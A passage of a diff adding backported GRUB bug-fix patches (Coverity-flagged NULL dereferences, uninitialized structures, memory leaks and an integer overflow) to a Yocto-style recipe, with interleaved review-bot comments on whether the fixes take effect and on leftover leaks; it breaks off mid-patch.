+diff --git a/grub-core/lib/gnulib-patches/fix-unused-value.patch b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+new file mode 100644
+index 0000000..ba51f1b
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-unused-value.patch
+@@ -0,0 +1,14 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-10-21 14:32:07.961765604 +0000
++@@ -828,7 +828,11 @@
++ break;
++ if (__glibc_unlikely (err != REG_NOMATCH))
++ goto free_return;
+++#ifdef DEBUG
+++ /* Only used for assertion below when DEBUG is set, otherwise
+++ it will be over-written when we loop around. */
++ match_last = -1;
+++#endif
++ }
++ else
++ break; /* We found a match. */
diff --git a/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
new file mode 100644
index 0000000000..b6e3c7edbe
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0009-gnulib-regcomp-Fix-uninitialized-token-structure.patch
@@ -0,0 +1,53 @@
+From 2af8df02cca7fd4b584575eac304cd03fa23f5cc Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 22 Oct 2020 13:54:06 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized token structure
+
+The code is assuming that the value of br_token.constraint was
+initialized to zero when it wasn't.
+
+While some compilers will ensure that, not all do, so it is better to
+fix this explicitly than leave it to chance.
+
+Fixes: CID 73749
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=75c3d3cec4f408848f575d6d5e30a95bd6313db0]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-uninit-structure.patch | 11 +++++++++++
+ 2 files changed, 12 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9b01152..9e55458 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/no-abort.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-uninit-structure.patch b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+new file mode 100644
+index 0000000..7b4d9f6
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+@@ -0,0 +1,11 @@
++--- a/lib/regcomp.c 2020-10-22 13:49:06.770168928 +0000
+++++ b/lib/regcomp.c 2020-10-22 13:50:37.026528298 +0000
++@@ -3662,7 +3662,7 @@
++ Idx alloc = 0;
++ #endif /* not RE_ENABLE_I18N */
++ reg_errcode_t ret;
++- re_token_t br_token;
+++ re_token_t br_token = {0};
++ bin_tree_t *tree;
++
++ sbcset = (re_bitset_ptr_t) calloc (sizeof (bitset_t), 1);
diff --git a/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
new file mode 100644
index 0000000000..102a494561
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0010-gnulib-argp-help-Fix-dereference-of-a-possibly-NULL-.patch
@@ -0,0 +1,52 @@
+From eaf9da8b5f8349c51cfc89dd8e39a1a61f89790a Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 28 Oct 2020 14:43:01 +0000
+Subject: [PATCH] gnulib/argp-help: Fix dereference of a possibly NULL state
+
+All other instances of call to __argp_failure() where there is
+a dgettext() call is first checking whether state is NULL before
+attempting to dereference it to get the root_argp->argp_domain.
+
+Fixes: CID 292436
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=3a37bf120a9194c373257c70175cdb5b337bc107]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-null-state-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 9e55458..96d7e69 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -29,6 +29,7 @@ EXTRA_DIST += grub-core/genemuinit.sh
+ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-null-state-deref.patch b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+new file mode 100644
+index 0000000..813ec09
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-null-state-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/argp-help.c 2020-10-28 14:32:19.189215988 +0000
+++++ b/lib/argp-help.c 2020-10-28 14:38:21.204673940 +0000
++@@ -145,7 +145,8 @@
++ if (*(int *)((char *)upptr + up->uparams_offs) >= upptr->rmargin)
++ {
++ __argp_failure (state, 0, 0,
++- dgettext (state->root_argp->argp_domain,
+++ dgettext (state == NULL ? NULL
+++ : state->root_argp->argp_domain,
++ "\
++ ARGP_HELP_FMT: %s value is less than or equal to %s"),
++ "rmargin", up->name);
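Review bot: Nothing in this backport applies fix-null-state-deref.patch to the gnulib sources. Its diffstat lists only conf/Makefile.extra-dist and the new file under grub-core/lib/gnulib-patches, so on its own it ships the fix without changing lib/argp-help.c. Whether the recipe re-runs the step that applies the gnulib-patches directory is not visible here; if it builds from pre-generated gnulib sources, the `state == NULL` guard is never compiled in. The same question applies to 0011 (fix-regexec-null-deref.patch) and 0012 (fix-regcomp-uninit-token.patch). I would record the dependency in the patch header, e.g. `Note: takes effect only when grub-core/lib/gnulib-patches is re-applied to gnulib during the build.`, and confirm it against the built lib/argp-help.c.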
diff --git a/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
new file mode 100644
index 0000000000..4f43fcf7d5
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0011-gnulib-regexec-Fix-possible-null-dereference.patch
@@ -0,0 +1,53 @@
+From 244dc2b1f518635069a556c424b2e7627f0cf036 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:57:14 +0000
+Subject: [PATCH] gnulib/regexec: Fix possible null-dereference
+
+It appears to be possible that the mctx->state_log field may be NULL,
+and the name of this function, clean_state_log_if_needed(), suggests
+that it should be checking that it is valid to be cleaned before
+assuming that it does.
+
+Fixes: CID 86720
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=0b7f347638153e403ee2dd518af3ce26f4f99647]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../lib/gnulib-patches/fix-regexec-null-deref.patch | 12 ++++++++++++
+ 2 files changed, 13 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index 96d7e69..d27d3a9 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-width.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+new file mode 100644
+index 0000000..db6dac9
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+@@ -0,0 +1,12 @@
++--- a/lib/regexec.c 2020-10-21 14:25:35.310195912 +0000
+++++ b/lib/regexec.c 2020-11-05 10:55:09.621542984 +0000
++@@ -1692,6 +1692,9 @@
++ {
++ Idx top = mctx->state_log_top;
++
+++ if (mctx->state_log == NULL)
+++ return REG_NOERROR;
+++
++ if ((next_state_log_idx >= mctx->input.bufs_len
++ && mctx->input.bufs_len < mctx->input.len)
++ || (next_state_log_idx >= mctx->input.valid_len
diff --git a/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
new file mode 100644
index 0000000000..0507e0cd66
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0012-gnulib-regcomp-Fix-uninitialized-re_token.patch
@@ -0,0 +1,55 @@
+From 512b6bb380a77233b88c84b7a712896c70281d2f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 24 Nov 2020 18:04:22 +0000
+Subject: [PATCH] gnulib/regcomp: Fix uninitialized re_token
+
+This issue has been fixed in the latest version of gnulib, so to
+maintain consistency, I've backported that change rather than doing
+something different.
+
+Fixes: CID 73828
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=03477085f9a33789ba6cca7cd49ab9326a1baa0e]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ conf/Makefile.extra-dist | 1 +
+ .../gnulib-patches/fix-regcomp-uninit-token.patch | 15 +++++++++++++++
+ 2 files changed, 16 insertions(+)
+ create mode 100644 grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+
+diff --git a/conf/Makefile.extra-dist b/conf/Makefile.extra-dist
+index d27d3a9..ffe6829 100644
+--- a/conf/Makefile.extra-dist
++++ b/conf/Makefile.extra-dist
+@@ -30,6 +30,7 @@ EXTRA_DIST += grub-core/genemuinitheader.sh
+
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-null-state-deref.patch
++EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-regexec-null-deref.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-uninit-structure.patch
+ EXTRA_DIST += grub-core/lib/gnulib-patches/fix-unused-value.patch
+diff --git a/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+new file mode 100644
+index 0000000..02e0631
+--- /dev/null
++++ b/grub-core/lib/gnulib-patches/fix-regcomp-uninit-token.patch
+@@ -0,0 +1,15 @@
++--- a/lib/regcomp.c 2020-11-24 17:06:08.159223858 +0000
+++++ b/lib/regcomp.c 2020-11-24 17:06:15.630253923 +0000
++@@ -3808,11 +3808,7 @@
++ create_tree (re_dfa_t *dfa, bin_tree_t *left, bin_tree_t *right,
++ re_token_type_t type)
++ {
++- re_token_t t;
++-#if defined GCC_LINT || defined lint
++- memset (&t, 0, sizeof t);
++-#endif
++- t.type = type;
+++ re_token_t t = { .type = type };
++ return create_token_tree (dfa, left, right, &t);
++ }
++
diff --git a/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
new file mode 100644
index 0000000000..1190b0d090
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0013-io-lzopio-Resolve-unnecessary-self-assignment-errors.patch
@@ -0,0 +1,41 @@
+From c529ca446424f1a9c64f0007dfe31fa7645d13ac Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Wed, 21 Oct 2020 14:44:10 +0000
+Subject: [PATCH] io/lzopio: Resolve unnecessary self-assignment errors
+
+These 2 assignments are unnecessary since they are just assigning
+to themselves.
+
+Fixes: CID 73643
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=59666e520f44177c97b82a44c169b3b315d63b42]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/io/lzopio.c | 4 ----
+ 1 file changed, 4 deletions(-)
+
+diff --git a/grub-core/io/lzopio.c b/grub-core/io/lzopio.c
+index 3014485..a7d4425 100644
+--- a/grub-core/io/lzopio.c
++++ b/grub-core/io/lzopio.c
+@@ -125,8 +125,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ucheck)) !=
+ sizeof (lzopio->block.ucheck))
+ return -1;
+-
+- lzopio->block.ucheck = lzopio->block.ucheck;
+ }
+
+ /* Read checksum of compressed data. */
+@@ -143,8 +141,6 @@ read_block_header (struct grub_lzopio *lzopio)
+ sizeof (lzopio->block.ccheck)) !=
+ sizeof (lzopio->block.ccheck))
+ return -1;
+-
+- lzopio->block.ccheck = lzopio->block.ccheck;
+ }
+ }
+
diff --git a/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
new file mode 100644
index 0000000000..19d881c1ca
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0014-zstd-Initialize-seq_t-structure-fully.patch
@@ -0,0 +1,34 @@
+From f55ffe6bd8b844a8cd9956702f42ac2eb96ad56f Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 5 Nov 2020 10:29:59 +0000
+Subject: [PATCH] zstd: Initialize seq_t structure fully
+
+While many compilers will initialize this to zero, not all will, so it
+is better to be sure that fields not being explicitly set are at known
+values, and there is code that checks this fields value elsewhere in the
+code.
+
+Fixes: CID 292440
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=2777cf4466719921dbe4b30af358a75e7d76f217]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/lib/zstd/zstd_decompress.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/lib/zstd/zstd_decompress.c b/grub-core/lib/zstd/zstd_decompress.c
+index 711b5b6..e4b5670 100644
+--- a/grub-core/lib/zstd/zstd_decompress.c
++++ b/grub-core/lib/zstd/zstd_decompress.c
+@@ -1325,7 +1325,7 @@ typedef enum { ZSTD_lo_isRegularOffset, ZSTD_lo_isLongOffset=1 } ZSTD_longOffset
+ FORCE_INLINE_TEMPLATE seq_t
+ ZSTD_decodeSequence(seqState_t* seqState, const ZSTD_longOffset_e longOffsets)
+ {
+- seq_t seq;
++ seq_t seq = {0};
+ U32 const llBits = seqState->stateLL.table[seqState->stateLL.state].nbAdditionalBits;
+ U32 const mlBits = seqState->stateML.table[seqState->stateML.state].nbAdditionalBits;
+ U32 const ofBits = seqState->stateOffb.table[seqState->stateOffb.state].nbAdditionalBits;
diff --git a/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
new file mode 100644
index 0000000000..af9fcd45cc
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0015-kern-partition-Check-for-NULL-before-dereferencing-i.patch
@@ -0,0 +1,43 @@
+From 0da8ef2e03a8591586b53a29af92d2ace76a04e3 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Fri, 23 Oct 2020 09:49:59 +0000
+Subject: [PATCH] kern/partition: Check for NULL before dereferencing input
+ string
+
+There is the possibility that the value of str comes from an external
+source and continuing to use it before ever checking its validity is
+wrong. So, needs fixing.
+
+Additionally, drop unneeded part initialization.
+
+Fixes: CID 292444
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=bc9c468a2ce84bc767234eec888b71f1bc744fff]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/kern/partition.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/kern/partition.c b/grub-core/kern/partition.c
+index e499147..b10a184 100644
+--- a/grub-core/kern/partition.c
++++ b/grub-core/kern/partition.c
+@@ -109,11 +109,14 @@ grub_partition_map_probe (const grub_partition_map_t partmap,
+ grub_partition_t
+ grub_partition_probe (struct grub_disk *disk, const char *str)
+ {
+- grub_partition_t part = 0;
++ grub_partition_t part;
+ grub_partition_t curpart = 0;
+ grub_partition_t tail;
+ const char *ptr;
+
++ if (str == NULL)
++ return 0;
++
+ part = tail = disk->partition;
+
+ for (ptr = str; *ptr;)
diff --git a/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
new file mode 100644
index 0000000000..c1687c75d0
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0016-disk-ldm-Make-sure-comp-data-is-freed-before-exiting.patch
@@ -0,0 +1,128 @@
+From 0c5d0fd796e6cafba179321de396681a493c4158 Mon Sep 17 00:00:00 2001
+From: Marco A Benatto <mbenatto@redhat.com>
+Date: Mon, 7 Dec 2020 11:53:03 -0300
+Subject: [PATCH] disk/ldm: Make sure comp data is freed before exiting from
+ make_vg()
+
+Several error handling paths in make_vg() do not free comp data before
+jumping to fail2 label and returning from the function. This will leak
+memory. So, let's fix all issues of that kind.
+
+Fixes: CID 73804
+
+Signed-off-by: Marco A Benatto <mbenatto@redhat.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=23e39f50ca7a107f6b66396ed4d177a914dee035]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 51 ++++++++++++++++++++++++++++++++++++++------
+ 1 file changed, 44 insertions(+), 7 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 58f8a53..428415f 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -554,7 +554,11 @@ make_vg (grub_disk_t disk,
+ comp->segments = grub_calloc (comp->segment_alloc,
+ sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+ else
+ {
+@@ -562,7 +566,11 @@ make_vg (grub_disk_t disk,
+ comp->segment_count = 1;
+ comp->segments = grub_malloc (sizeof (*comp->segments));
+ if (!comp->segments)
+- goto fail2;
++ {
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ comp->segments->start_extent = 0;
+ comp->segments->extent_count = lv->size;
+ comp->segments->layout = 0;
+@@ -574,15 +582,26 @@ make_vg (grub_disk_t disk,
+ comp->segments->layout = GRUB_RAID_LAYOUT_SYMMETRIC_MASK;
+ }
+ else
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ ptr += *ptr + 1;
+ ptr++;
+ if (!(vblk[i].flags & 0x10))
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ if (ptr >= vblk[i].dynamic + sizeof (vblk[i].dynamic)
+ || ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -592,6 +611,7 @@ make_vg (grub_disk_t disk,
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
+ {
++ grub_free (comp->segments);
+ grub_free (comp->internal_id);
+ grub_free (comp);
+ goto fail2;
+@@ -601,7 +621,12 @@ make_vg (grub_disk_t disk,
+ comp->segments->nodes = grub_calloc (comp->segments->node_alloc,
+ sizeof (*comp->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ }
+
+ if (lv->segments->node_alloc == lv->segments->node_count)
+@@ -611,11 +636,23 @@ make_vg (grub_disk_t disk,
+
+ if (grub_mul (lv->segments->node_alloc, 2, &lv->segments->node_alloc) ||
+ grub_mul (lv->segments->node_alloc, sizeof (*lv->segments->nodes), &sz))
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+
+ t = grub_realloc (lv->segments->nodes, sz);
+ if (!t)
+- goto fail2;
++ {
++ grub_free (comp->segments->nodes);
++ grub_free (comp->segments);
++ grub_free (comp->internal_id);
++ grub_free (comp);
++ goto fail2;
++ }
+ lv->segments->nodes = t;
+ }
+ lv->segments->nodes[lv->segments->node_count].pv = 0;
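Review bot: The new cleanup block in the `-601,7 +621,12` hunk sits under `if (!lv->segments->nodes)`, but the allocation just above it is stored in `comp->segments->nodes`. As written, a failed `grub_calloc` for the component's node array is not caught by this test, and the frees added here depend on an unrelated pointer. The condition should probably read `if (!comp->segments->nodes)`; the line is context rather than part of this change, so confirm against the rest of make_vg(), which starts and ends outside the hunk. Separately, the same three or four `grub_free` calls are now repeated at nine exits, which makes it easy for a future exit to miss one; a single cleanup label ahead of `fail2` would keep them in one place.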
diff --git a/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
new file mode 100644
index 0000000000..ecdb230f76
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0017-disk-ldm-If-failed-then-free-vg-variable-too.patch
@@ -0,0 +1,28 @@
+From 253485e8df3c9dedac848567e638157530184295 Mon Sep 17 00:00:00 2001
+From: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Date: Mon, 7 Dec 2020 10:07:47 -0300
+Subject: [PATCH] disk/ldm: If failed then free vg variable too
+
+Fixes: CID 73809
+
+Signed-off-by: Paulo Flabiano Smorigo <pfsmorigo@canonical.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=e0b83df5da538d2a38f770e60817b3a4b9d5b4d7]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 428415f..54713f4 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -199,6 +199,7 @@ make_vg (grub_disk_t disk,
+ {
+ grub_free (vg->uuid);
+ grub_free (vg->name);
++ grub_free (vg);
+ return NULL;
+ }
+ grub_memcpy (vg->uuid, label->group_guid, LDM_GUID_STRLEN);
diff --git a/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
new file mode 100644
index 0000000000..26932f674c
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0018-disk-ldm-Fix-memory-leak-on-uninserted-lv-references.patch
@@ -0,0 +1,50 @@
+From 3e1d2f1959acbe5152cdd5818d495f6455d1a158 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Tue, 8 Dec 2020 10:00:51 +0000
+Subject: [PATCH] disk/ldm: Fix memory leak on uninserted lv references
+
+The problem here is that the memory allocated to the variable lv is not
+yet inserted into the list that is being processed at the label fail2.
+
+As we can already see at line 342, which correctly frees lv before going
+to fail2, we should also be doing that at these earlier jumps to fail2.
+
+Fixes: CID 73824
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=156c281a1625dc73fd350530630c6f2d5673d4f6]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/ldm.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/grub-core/disk/ldm.c b/grub-core/disk/ldm.c
+index 54713f4..e82e989 100644
+--- a/grub-core/disk/ldm.c
++++ b/grub-core/disk/ldm.c
+@@ -321,7 +321,10 @@ make_vg (grub_disk_t disk,
+ lv->visible = 1;
+ lv->segments = grub_zalloc (sizeof (*lv->segments));
+ if (!lv->segments)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ lv->segments->start_extent = 0;
+ lv->segments->type = GRUB_DISKFILTER_MIRROR;
+ lv->segments->node_count = 0;
+@@ -329,7 +332,10 @@ make_vg (grub_disk_t disk,
+ lv->segments->nodes = grub_calloc (lv->segments->node_alloc,
+ sizeof (*lv->segments->nodes));
+ if (!lv->segments->nodes)
+- goto fail2;
++ {
++ grub_free (lv);
++ goto fail2;
++ }
+ ptr = vblk[i].dynamic;
+ if (ptr + *ptr + 1 >= vblk[i].dynamic
+ + sizeof (vblk[i].dynamic))
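Review bot: The second added block frees `lv` while `lv->segments` is still allocated. `lv->segments` was obtained from `grub_zalloc` a few lines earlier, and once `lv` is gone nothing can reach it, so the `!lv->segments->nodes` failure path still leaks the segment structure. Adding `grub_free (lv->segments);` ahead of `grub_free (lv);` in that block closes it. Any other members of `lv` allocated before this point in make_vg() are outside the hunk and should be checked the same way.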
diff --git a/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
new file mode 100644
index 0000000000..dd7fda357d
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/0019-disk-cryptodisk-Fix-potential-integer-overflow.patch
@@ -0,0 +1,50 @@
+From 2550aaa0c23fdf8b6c54e00c6b838f2e3aa81fe2 Mon Sep 17 00:00:00 2001
+From: Darren Kenny <darren.kenny@oracle.com>
+Date: Thu, 21 Jan 2021 11:38:31 +0000
+Subject: [PATCH] disk/cryptodisk: Fix potential integer overflow
+
+The encrypt and decrypt functions expect a grub_size_t. So, we need to
+ensure that the constant bit shift is using grub_size_t rather than
+unsigned int when it is performing the shift.
+
+Fixes: CID 307788
+
+Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=a201ad17caa430aa710654fdf2e6ab4c8166f031]
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ grub-core/disk/cryptodisk.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/grub-core/disk/cryptodisk.c b/grub-core/disk/cryptodisk.c
+index 5037768..6883f48 100644
+--- a/grub-core/disk/cryptodisk.c
++++ b/grub-core/disk/cryptodisk.c
+@@ -311,10 +311,10 @@ grub_cryptodisk_endecrypt (struct grub_cryptodisk *dev,
+ case GRUB_CRYPTODISK_MODE_CBC:
+ if (do_encrypt)
+ err = grub_crypto_cbc_encrypt (dev->cipher, data + i, data + i,
